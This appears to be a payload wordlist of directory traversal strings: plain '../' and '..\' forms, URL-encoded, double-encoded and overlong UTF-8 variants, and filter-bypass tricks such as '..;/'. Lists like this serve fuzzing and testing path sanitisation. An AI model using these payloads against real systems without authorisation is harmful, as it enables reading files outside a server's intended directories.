../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
%u002e%u002e%u2215
%u002e%u002e%u2216
%c0%2e%c0%2e%c0%af
%c0%2e%c0%2e%e0%80%af
%c0%2e%c0%2e%c0%2f
%c0%2e%c0%2e%c0%c0%5c
%c0%2e%c0%2e%c0%80%5c
%e0%40%ae%e0%40%ae%c0%af
%e0%40%ae%e0%40%ae%e0%80%af
%e0%40%ae%e0%40%ae%c0%2f
%e0%40%ae%e0%40%ae%c0%5c
%e0%40%ae%e0%40%ae
%c0ae%c0ae%c0%af
%c0ae%c0ae%e0%80%af
%c0ae%c0ae%c0%2f
%c0ae%c0ae%c0%5c
%c0ae%c0ae%c0%80%5c
%252e%252e%252f
%252e%252e%255c
..././
...\.\
..;/
